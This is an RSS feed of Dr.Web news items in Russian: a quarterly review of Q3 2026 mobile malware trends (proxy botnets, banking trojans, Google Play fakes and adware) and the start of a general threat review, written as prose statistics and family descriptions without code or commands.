<?xml version="1.0"?>
<rss version="2.0"><channel><title>Все новости</title><link>https://news.drweb.ru/news/</link><description>Новости компании "Доктор Веб" - Все новости</description><image><url>https://st.drweb.com/static/drweb_logo_ru.gif</url><link>https://news.drweb.ru/news/</link><title>Антивирус Dr.Web</title></image><item><guid>https://news.drweb.ru/show/?i=15305&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности для мобильных устройств в III квартале 2026 года</title><link>https://news.drweb.ru/show/?i=15305&amp;lng=ru&amp;c=5</link><pubDate>Thu, 01 Oct 2026 12:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/review_mobile_q3_2026_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;1 октября 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в III квартале 2026 года наблюдался всплеск активности троянских приложений &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, позволяющих киберпреступникам перенаправлять сетевой трафик через устройства жертв и анонимизировать свое интернет-подключение. Рост главным образом произошел за счет троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt;, на долю которых суммарно пришлось более 22% всех детектирований вредоносного ПО. Они добавляют зараженные устройства к прокси-ботнетам и превращают каждое из них в выходной узел соответствующей прокси-сети.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;По сравнению со II кварталом, число атак со стороны банковских троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; несколько возросло, и эти вредоносные приложения с долей 18,06% расположились на втором месте. Как и ранее, самыми активными среди них были представители подсемейства &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, способные среди прочего перехватывать содержимое СМС и уведомлений с целью кражи одноразовых кодов подтверждения банковских операций.&lt;/p&gt;

&lt;p&gt;В то же время пользователи стали реже сталкиваться с рекламными троянами семейств &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Число их детектирований за последние 3 месяца вновь сократилось — на 30,96% и 14,36% соответственно, а их общая доля среди выявленного вредоносного ПО на данный момент не превышает 10%.&lt;/p&gt;

&lt;p&gt;Среди потенциально опасного ПО лидерами остаются программы, в которые при помощи хакерских инструментов для моддинга NP Manager добавлен мусорный код, запутывающий логику приложений. Вирусописатели используют этот прием для защиты вредоносного ПО от антивирусов. Например, он активно применяется при защите банковских троянов &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. В III квартале на такие модификации (детектируются как &lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;) пришлось 69,01% детектирований потенциально опасных приложений.&lt;/p&gt;

&lt;p&gt;Второе место вновь заняли программы, которые модифицируются с использованием других функциональных возможностей NP Manager. Например, злоумышленники могут обфусцировать код троянов для защиты их от обнаружения и анализа. Доля подобных модов (они детектируются как &lt;a href="https://vms.drweb.ru/search/?q=Tool.NPMod&amp;lng=ru"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;) составила 19,16% от общего числа детектирований потенциально опасного ПО. Замыкают тройку лидеров программы, модифицированные при помощи утилиты &lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Эта утилита загружает из интернета специально подготовленные скрипты, которые могут представлять потенциальную опасность, поскольку их могут создавать все желающие, включая вирусописателей. На модифицированные таким образом программы пришлось 5,77% детектирований.&lt;/p&gt;

&lt;p&gt;Самыми распространенными нежелательными приложениями в III квартале остались &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; — программы, имитирующие работу антивирусов. Они сообщают пользователям, что обнаружили те или иные угрозы, и для «лечения» заражения предлагают приобрести полную версию. Доля такого ПО среди общего числа детектирований нежелательных программ по сравнению с прошлым периодом наблюдения выросла с 44,10% до 51,09%.&lt;/p&gt;

&lt;p&gt;Наиболее распространенным рекламным ПО стали модули &lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, встраиваемые в Android-приложения. В III квартале на них пришлось 39,46% детектирований угроз данного типа. Эти модули демонстрируют рекламные уведомления, которые вводят пользователей в заблуждение. Они также собирают ряд конфиденциальных данных.&lt;/p&gt;

&lt;p&gt;В течение последних 3 месяцев наблюдался рост активности рекламных модулей &lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; — их доля возросла с 7,39% до 10,34%. Наиболее заметными среди них остаются модификации &lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;. Модули &lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; могут демонстрировать рекламные уведомления, баннеры и всплывающие окна, при этом киберпреступники используют их и для распространения вредоносных программ.&lt;/p&gt;

&lt;p&gt;Пользователи продолжили сталкиваться с рекламными программами &lt;b&gt;Adware.Opensite.15&lt;/b&gt;, однако их активность по сравнению со II кварталом снизилась: их доля упала с 14,26% до 7,90%. Эти приложения распространяются под видом программ с читами для получения различных ресурсов в играх, но они лишь загружают сайты с рекламой. Менее заметными стали и одни из лидеров последних месяцев — приложения &lt;a href="https://vms.drweb.ru/search/?q=Adware.Bastion&amp;lng=ru"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. На них пришлось 5,73% детектирований рекламного ПО. Они создают уведомления с вводящими в заблуждение сообщениями, которые предупреждают о якобы возникающих ошибках системы и нехватке оперативной памяти. А во время «оптимизации» они демонстрируют рекламу.&lt;/p&gt;

&lt;p&gt;В течение III квартала специалисты антивирусной лаборатории компании «Доктор Веб» выявили в каталоге Google Play множество новых вредоносных приложений, включая десятки троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые подписывают пользователей на платные мобильные услуги. При этом в процессе анализа троянов наши эксперты обнаружили, что вирусописатели расширили функциональность семейства. Некоторые модификации &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; теперь способны не только оформлять подписки, но и превращать зараженные устройства в выходные узлы прокси-ботнета. В Google Play также распространялись очередные программы-подделки из семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые используются в различных мошеннических схемах.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;ГЛАВНЫЕ ТЕНДЕНЦИИ III КВАРТАЛА&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Пользователи столкнулись с высокой активностью вредоносных программ &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, с помощью которых злоумышленники могут перенаправлять сетевой трафик через устройства жертв.&lt;/li&gt;
        &lt;li&gt;Наблюдался рост числа атак банковских троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
        &lt;li&gt;Продолжилось снижение активности рекламных троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
        &lt;li&gt;В каталоге Google Play были обнаружены десятки вредоносных программ.&lt;/li&gt;
        &lt;li&gt;Троянские приложения &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; получили функциональность, позволяющую превращать зараженные устройства в выходные узлы прокси-ботнета.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным Dr.Web Security Space для мобильных устройств&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/01_malware_q3_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/01_malware_q3_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Proxy.60.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Android.Proxy.61.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносные программы, которые превращают зараженные устройства в выходные узлы прокси-ботнетов и позволяют злоумышленникам перенаправлять через них сетевой трафик.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.SpyMax.17&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносная программа-шпион, обладающая широкой функциональностью. Киберпреступники используют ее в том числе как банковский троян для перехвата СМС с проверочными кодами, поступающими от кредитных организаций.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа для показа навязчивой рекламы. Представители семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; часто распространяются под видом безобидных приложений и в некоторых случаях устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.263.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Банковский троян, который перехватывает СМС с одноразовыми кодами от кредитных организаций, содержимое уведомлений, а также собирает другую конфиденциальную информацию. Она включает технические данные о зараженном устройстве, список установленных приложений, информацию о СИМ-карте, телефонных звонках, поступивших и отправленных СМС.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/02_unwanted_q3_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/02_unwanted_q3_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие приложения могут вводить пользователей в заблуждение и сообщать о несуществующих угрозах, либо ошибочно идентифицировать безопасные приложения как вредоносные. В некоторых случаях для «лечения» якобы обнаруженных угроз они могут требовать приобрести полную версию ПО.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно вывести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как &lt;a href="https://vms.drweb.ru/search/?q=Tool.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими: блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т.&amp;nbsp;д.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/03_riskware_q3_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/03_riskware_q3_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-программ, в которые при помощи хакерских инструментов для моддинга приложений добавлен мусорный код. Такая модификация выполняется с целью запутывания логики программ. Эта техника часто встречается в банковских троянах и в пиратских версиях ПО.&lt;/dd&gt;

     &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
     &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.&lt;/dd&gt;

     &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/04_adware_q3_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/04_adware_q3_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.&lt;/dd&gt;

     &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Приложения, выдаваемые за чит-инструменты для получения ресурсов в играх. На самом деле они созданы для демонстрации рекламы. Эти программы получают с удаленного сервера конфигурацию, в соответствии с которой загружают целевой сайт с объявлениями — баннерами, всплывающими окнами, видеороликами и т. д.&lt;/dd&gt;

     &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.&lt;/dd&gt;
     &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Bastion&amp;lng=ru"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями якобы о нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Угрозы в Google Play&lt;/h3&gt;

&lt;p&gt;В III квартале 2026 года специалисты антивирусной лаборатории «Доктор Веб» обнаружили свыше 50 вредоносных приложений в каталоге Google Play. Большинство из них относилось к семейству троянских программ &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые скрытно оформляют подписку на платные мобильные услуги. Для этого они похищают одноразовые коды подтверждения, перехватывая СМС и содержимое уведомлений. Вирусописатели распространяли трояны под видом разнообразного ПО, включая мессенджеры, утилиты для оптимизации работы устройств, программы-фотокамеры, инструменты для распознавания текста и мультимедийные плееры для онлайн-просмотра фильмов и сериалов.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/05_Android.Joker.2679_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/05_Android.Joker.2679_1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/06_Android.Joker.2682_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/06_Android.Joker.2682_1.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры приложений из Google Play, которые скрывали в себе трояны &lt;b&gt;Android.Joker&lt;/b&gt;: Special Camera — &lt;b&gt;Android.Joker.2679&lt;/b&gt;, Color Messages — &lt;b&gt;Android.Joker.2682&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;При изучении новых образцов &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; наши эксперты обнаружили, что в некоторые из них была добавлена функциональность, позволяющая превращать зараженные устройства в выходные узлы прокси-ботнета. Злоумышленники могут использовать эту функциональность для продажи услуг по выходу в интернет через сеть жертв.&lt;/p&gt;

&lt;p&gt;Анализ показал, что один из управляющих серверов ботнета не был защищен авторизацией. Благодаря этому вирусные аналитики «Доктор Веб» смогли получить из панели управления информацию о статистике его работы, а также о том, в какие приложения внедрены вредоносные модули &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;. По данным на конец августа обновленными троянами семейства было заражено свыше 187 000 устройств, а число активных арендаторов нелегальной прокси-сети достигало 93.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/07_Android.Joker_proxy_stat.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/07_Android.Joker_proxy_stat.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Веб-панель управления прокси-ботнетом на базе устройств, зараженных некоторыми модификациями &lt;b&gt;Android.Joker&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Другими выявленными угрозами стали новые варианты троянских программ &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые могут загружать различные сайты, в том числе вредоносные и мошеннические. Они распространялись под видом программ для управления финансами и планирования семейного бюджета, приложений-органайзеров для ведения заметок, программ для поиска работы, а также различных игр. Большинство троянов с целью маскировки действительно предоставляло заявленную функциональность, однако при определенных условиях вместо этого вредоносные программы загружали мошеннические веб-сайты.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/08_Android.FakeApp_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/08_Android.FakeApp_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Примеры вредоносных программ-подделок &lt;b&gt;Android.FakeApp&lt;/b&gt;, которые наши специалисты нашли в Google Play в III квартале 2026 года&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Например, &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2022&lt;/b&gt; загружал сайт, где демонстрировался список «актуальных вакансий» с высокой заработной платой и привлекательными условиями труда. При этом в оформлении мошеннического интернет-ресурса использовался логотип, оформленный в стиле и цветах официального логотипа российского портала «Госуслуги».&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/09_Android.FakeApp_job1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/09_Android.FakeApp_job1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Одна из вакансий, якобы доступная потенциальной жертве&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Пользователям предлагалось подробнее ознакомиться с интересующими вакансиями. Для этого от них требовалось оставить заявку, после чего те якобы могли «начать зарабатывать уже сегодня». Злоумышленники запрашивали конфиденциальную информацию, включая имя и фамилию, возраст, гражданство и номер мобильного телефона, а также предлагали выбрать удобное время для приема звонка от «специалиста».&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/10_Android.FakeApp_job2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/10_Android.FakeApp_job2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Загруженный трояном веб-сайт собирает персональные данные, которые мошенники в дальнейшем могут использовать для обмана своих жертв&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;

</description></item><item><guid>https://news.drweb.ru/show/?i=15304&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности в III квартале 2026 года</title><link>https://news.drweb.ru/show/?i=15304&amp;lng=ru&amp;c=5</link><pubDate>Thu, 01 Oct 2026 03:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/review_common_q3_2026_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;1 октября 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;По данным статистики детектирований антивируса Dr.Web, в III квартале 2026 года пользователи сталкивались с угрозами на 14,86% реже, чем во II квартале. Число уникальных файлов, применявшихся в атаках, снизилось на 49,26%. При этом по сравнению с прошлым периодом наблюдения среди выявленных угроз оказалось на 63,39% меньше уникальных имен. Чаще всего на защищаемых устройствах обнаруживались рекламные программы и рекламные трояны, вредоносные приложения, похищающие пароли и другую конфиденциальную информацию, а также дропперы и загрузчики, устанавливающие в целевую систему различные угрозы. Кроме того, по-прежнему активными были трояны, которые применяются для автоматического запуска других вредоносных приложений.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Число запросов на расшифровку, поступивших в Службу технической поддержки «Доктор Веб», по сравнению со II кварталом увеличилось на 5,85%. Обращения преимущественно были связаны с энкодерами &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; и &lt;b&gt;Trojan.Encoder.44474&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;В почтовом трафике чаще всего детектировались вредоносные скрипты, большую часть которых составляли загрузчики и дропперы, устанавливающие другие угрозы в атакуемую систему. Кроме того, через электронные письма распространялись фишинговые документы, эксплойты и различные троянские приложения. Среди последних, как и в случае с вредоносными скриптами, самая высокая активность наблюдалась со стороны дропперов и загрузчиков.&lt;/p&gt;

&lt;p&gt;В III квартале интернет-аналитики компании «Доктор Веб» продолжили наблюдать рост интереса мошенников к пользователям российского мессенджера MAX. Наши специалисты выявили множество новых фишинговых сайтов, созданных с целью кражи учетных записей от этой платформы. В то же время злоумышленники по-прежнему сохраняют интерес к получению доступа к аккаунтам от других мессенджеров, включая Telegram. Пользователи также сталкивались и с другими фишинговыми сайтами, среди которых были очередные поддельные интернет-ресурсы банков.&lt;/p&gt;

